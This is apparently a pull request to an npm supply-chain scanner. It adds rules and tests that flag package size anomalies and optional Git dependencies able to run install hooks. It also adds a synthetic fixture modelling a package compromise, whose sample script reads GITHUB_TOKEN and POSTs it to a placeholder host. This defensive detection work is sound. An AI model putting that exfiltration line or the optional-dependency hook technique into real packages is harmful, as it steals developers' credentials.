### PR TITLE
Flag optional external lifecycle dependencies

### DIFF
--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -59,6 +59,7 @@ The first corpus slice covers:
 - large opaque binary addition;
 - files that appear in the tarball outside a declared `package.json.files` allowlist;
 - unexpected large root-level JavaScript payloads;
+- aggregate package size anomalies compared with the previous release;
 - malformed `package.json` parse failure;
 - dependency and entrypoint package-json diff changes; unusual non-registry dependency specs now raise deterministic findings while entrypoint changes remain a documented coverage gap.
 

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -60,6 +60,7 @@ The first corpus slice covers:
 - files that appear in the tarball outside a declared `package.json.files` allowlist;
 - unexpected large root-level JavaScript payloads;
 - aggregate package size anomalies compared with the previous release;
+- TanStack-style optional Git dependencies that can run lifecycle hooks outside staged tarball evidence;
 - malformed `package.json` parse failure;
 - dependency and entrypoint package-json diff changes; unusual non-registry dependency specs now raise deterministic findings while entrypoint changes remain a documented coverage gap.
 

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -25,7 +25,7 @@ export interface Finding {
 // way that should invalidate cached scan reports. Stored alongside each
 // finding so historical reports can be traced back to the ruleset that
 // produced them.
-export const DETERMINISTIC_RULES_VERSION = "1.6.0";
+export const DETERMINISTIC_RULES_VERSION = "1.7.0";
 
 export const DETERMINISTIC_RULE_IDS = {
   installScriptPreinstall: "install-script.preinstall",
@@ -44,6 +44,7 @@ export const DETERMINISTIC_RULE_IDS = {
   packageJsonParseFailed: "package-json.parse-failed",
   diffCredentialFileAdded: "diff.credential-file-added",
   diffLargeNewFile: "diff.large-new-file",
+  packageSizeAnomaly: "package.size-anomaly",
   dependencyUnusualSpec: "dependency.unusual-spec",
   dependencyOptionalAdded: "dependency.optional-added",
   stageMetadataMismatch: "stage.metadata-mismatch",
@@ -382,6 +383,19 @@ export function deterministicFindings(
     }
   }
 
+  const sizeAnomaly = packageSizeAnomaly(diff);
+  if (sizeAnomaly) {
+    findings.push(
+      tag("packageSizeAnomaly", {
+        severity: "high",
+        file: "package",
+        evidence: `unpacked size grew from ${sizeAnomaly.previousTotal} to ${sizeAnomaly.stagedTotal} bytes (${sizeAnomaly.ratio.toFixed(1)}x)`,
+        reason:
+          "large package size jumps can indicate injected payloads, vendored binaries, or generated artifacts that were not present in the previous release",
+      }),
+    );
+  }
+
   for (const entry of diff) {
     if (entry.status === "added" && /(^|\/)(\.npmrc|\.env|id_rsa|id_ed25519)$/i.test(entry.path)) {
       findings.push(
@@ -570,6 +584,7 @@ function isReleaseScopedFinding(finding: { ruleId?: string | null }): boolean {
     finding.ruleId?.startsWith("stage.") ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyUnusualSpec ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyOptionalAdded ||
+    finding.ruleId === DETERMINISTIC_RULE_IDS.packageSizeAnomaly ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.diffCredentialFileAdded ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.diffLargeNewFile,
   );
@@ -800,6 +815,22 @@ export function redactJson<T>(value: T): T {
     ) as T;
   }
   return value;
+}
+
+function packageSizeAnomaly(
+  diff: DiffEntry[],
+): { previousTotal: number; stagedTotal: number; ratio: number } | null {
+  let previousTotal = 0;
+  let stagedTotal = 0;
+  for (const entry of diff) {
+    previousTotal += entry.previousSize ?? 0;
+    stagedTotal += entry.stagedSize ?? 0;
+  }
+  if (previousTotal <= 0) return null;
+  const delta = stagedTotal - previousTotal;
+  const ratio = stagedTotal / previousTotal;
+  if (delta > 1024 * 1024 && ratio >= 3) return { previousTotal, stagedTotal, ratio };
+  return null;
 }
 
 function isUnexpectedRootLargeJavaScript(path: string, size: number): boolean {

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -25,7 +25,7 @@ export interface Finding {
 // way that should invalidate cached scan reports. Stored alongside each
 // finding so historical reports can be traced back to the ruleset that
 // produced them.
-export const DETERMINISTIC_RULES_VERSION = "1.7.0";
+export const DETERMINISTIC_RULES_VERSION = "1.8.0";
 
 export const DETERMINISTIC_RULE_IDS = {
   installScriptPreinstall: "install-script.preinstall",
@@ -47,6 +47,7 @@ export const DETERMINISTIC_RULE_IDS = {
   packageSizeAnomaly: "package.size-anomaly",
   dependencyUnusualSpec: "dependency.unusual-spec",
   dependencyOptionalAdded: "dependency.optional-added",
+  dependencyOptionalLifecycleRisk: "dependency.optional-lifecycle-risk",
   stageMetadataMismatch: "stage.metadata-mismatch",
 } as const;
 
@@ -524,6 +525,18 @@ export function packageJsonDiffFindings(
     }
     if (!entry.staged) continue;
     const kind = unusualDependencySpecKind(entry.staged);
+    if (kind && entry.section === "optionalDependencies" && kind !== "npm alias") {
+      findings.push({
+        severity: "critical",
+        file: "package.json",
+        line: firstJsonPropertyLine(stagedPackageJsonText, entry.key, entry.staged),
+        evidence: `${entry.key}: ${entry.staged}`,
+        reason:
+          "optional dependencies with external specs can run prepare/install lifecycle hooks outside the staged tarball evidence and then fail softly without leaving normal dependency traces",
+        ruleId: DETERMINISTIC_RULE_IDS.dependencyOptionalLifecycleRisk,
+        ruleVersion: DETERMINISTIC_RULES_VERSION,
+      });
+    }
     if (!kind) continue;
     findings.push({
       severity: "high",
@@ -584,6 +597,7 @@ function isReleaseScopedFinding(finding: { ruleId?: string | null }): boolean {
     finding.ruleId?.startsWith("stage.") ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyUnusualSpec ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyOptionalAdded ||
+    finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyOptionalLifecycleRisk ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.packageSizeAnomaly ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.diffCredentialFileAdded ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.diffLargeNewFile,

--- a/test/fixtures/security-corpus/cases/large-binary-added.json
+++ b/test/fixtures/security-corpus/cases/large-binary-added.json
@@ -46,6 +46,11 @@
       "ruleId": "diff.large-new-file",
       "severity": "medium",
       "file": "vendor/tool.bin"
+    },
+    {
+      "ruleId": "package.size-anomaly",
+      "severity": "high",
+      "file": "package"
     }
   ]
 }

--- a/test/fixtures/security-corpus/cases/package-size-anomaly.json
+++ b/test/fixtures/security-corpus/cases/package-size-anomaly.json
@@ -1,0 +1,32 @@
+{
+  "id": "package-size-anomaly",
+  "title": "Unpacked package size jumps by more than 3x",
+  "category": "size-anomaly",
+  "intent": "Catch releases whose aggregate unpacked size suddenly grows enough to suggest injected payloads or generated artifacts.",
+  "previousFiles": [
+    {
+      "path": "dist/index.js",
+      "size": 800000,
+      "sha256": "dist-before",
+      "flags": [],
+      "textSample": ""
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "dist/index.js",
+      "size": 3100000,
+      "sha256": "dist-after",
+      "flags": [],
+      "textSample": ""
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "package.size-anomaly",
+      "severity": "high",
+      "file": "package"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/tanstack-optional-git-payload.json
+++ b/test/fixtures/security-corpus/cases/tanstack-optional-git-payload.json
@@ -1,0 +1,111 @@
+{
+  "id": "tanstack-optional-git-payload",
+  "title": "TanStack-style optional Git dependency executes a root payload",
+  "category": "optional-git-lifecycle-payload",
+  "intent": "Model the key staged-artifact signals from the TanStack compromise without storing live malware: optional Git dependency, root payload, size anomaly, obfuscation, network, and credential access.",
+  "previousPackageJson": {
+    "name": "@example/router",
+    "version": "1.0.0",
+    "files": ["dist", "src"]
+  },
+  "stagedPackageJson": {
+    "name": "@example/router",
+    "version": "1.0.1",
+    "files": ["dist", "src"],
+    "optionalDependencies": {
+      "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
+    }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 80,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"@example/router\",\"version\":\"1.0.0\",\"files\":[\"dist\",\"src\"]}"
+    },
+    {
+      "path": "dist/index.js",
+      "size": 800000,
+      "sha256": "dist-before",
+      "flags": [],
+      "textSample": "export default 1;\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 200,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"@example/router\",\"version\":\"1.0.1\",\"files\":[\"dist\",\"src\"],\"optionalDependencies\":{\"@tanstack/setup\":\"github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c\"}}"
+    },
+    {
+      "path": "dist/index.js",
+      "size": 800000,
+      "sha256": "dist-before",
+      "flags": [],
+      "textSample": "export default 1;\n"
+    },
+    {
+      "path": "router_init.js",
+      "size": 2341681,
+      "sha256": "router-init-synthetic",
+      "flags": [],
+      "textSample": "const _0x1111=_0x2222;\n(function(_0x3333,_0x4444){while(!![]){try{parseInt(_0x1111(0x123));break;}catch(e){}}})(_0x5555,0x123);\n_0xaaaa();_0xbbbb();_0xcccc();_0xdddd();_0xeeee();_0xffff();_0xabcd();_0xbcde();\nconst value = process.env.GITHUB_TOKEN;\nfetch('https://example.invalid/upload', { method: 'POST', body: value });\n"
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "code.network-access",
+      "severity": "high",
+      "file": "router_init.js"
+    },
+    {
+      "ruleId": "code.credential-access",
+      "severity": "high",
+      "file": "router_init.js"
+    },
+    {
+      "ruleId": "code.obfuscated-large-js",
+      "severity": "high",
+      "file": "router_init.js"
+    },
+    {
+      "ruleId": "file.root-large-javascript",
+      "severity": "high",
+      "file": "router_init.js"
+    },
+    {
+      "ruleId": "file.outside-files-list",
+      "severity": "high",
+      "file": "router_init.js"
+    },
+    {
+      "ruleId": "package.size-anomaly",
+      "severity": "high",
+      "file": "package"
+    },
+    {
+      "ruleId": "diff.large-new-file",
+      "severity": "medium",
+      "file": "router_init.js"
+    },
+    {
+      "ruleId": "dependency.optional-added",
+      "severity": "high",
+      "file": "package.json"
+    },
+    {
+      "ruleId": "dependency.optional-lifecycle-risk",
+      "severity": "critical",
+      "file": "package.json"
+    },
+    {
+      "ruleId": "dependency.unusual-spec",
+      "severity": "high",
+      "file": "package.json"
+    }
+  ]
+}

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -396,6 +396,33 @@ _0xaaaa();_0xbbbb();_0xcccc();_0xdddd();_0xeeee();_0xffff();_0xabcd();_0xbcde();
     );
   });
 
+  test("flags optional external dependency lifecycle risk", () => {
+    const stagedPackageJsonText = `{
+  "name": "pkg",
+  "version": "1.0.1",
+  "optionalDependencies": {
+    "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
+  }
+}`;
+    const diff = summarizePackageJsonDiff(
+      { name: "pkg", version: "1.0.0" },
+      JSON.parse(stagedPackageJsonText),
+    );
+
+    const findings = packageJsonDiffFindings(diff, stagedPackageJsonText);
+
+    expect(findings).toContainEqual(
+      expect.objectContaining({
+        severity: "critical",
+        file: "package.json",
+        line: 5,
+        evidence:
+          "@tanstack/setup: github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c",
+        ruleId: "dependency.optional-lifecycle-risk",
+      }),
+    );
+  });
+
   test("flags newly added optional dependencies", () => {
     const stagedPackageJsonText = `{
   "name": "pkg",

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -296,6 +296,25 @@ describe("review", () => {
     ).toEqual([]);
   });
 
+  test("flags large package size anomalies compared to previous version", () => {
+    const previous = [
+      { path: "dist/index.js", size: 800_000, sha256: "before", flags: [], textSample: "" },
+    ];
+    const staged = [
+      { path: "dist/index.js", size: 3_100_000, sha256: "after", flags: [], textSample: "" },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff(previous, staged));
+
+    expect(findings).toContainEqual(
+      expect.objectContaining({
+        severity: "high",
+        file: "package",
+        evidence: "unpacked size grew from 800000 to 3100000 bytes (3.9x)",
+        ruleId: "package.size-anomaly",
+      }),
+    );
+  });
+
   test("flags unexpected large root-level JavaScript payloads", () => {
     const staged = [
       {


### PR DESCRIPTION
## Summary

- Flag optional dependencies with external specs as critical lifecycle risk.
- Add a TanStack-style synthetic corpus fixture combining optional Git dependency, root payload, obfuscation, credential/network access, files allowlist mismatch, and size anomaly signals.

## Stack

7/7 in the TanStack follow-up stack. Base: `tanstack/package-size-anomaly-findings`.

## Verification

- `pnpm run verify`
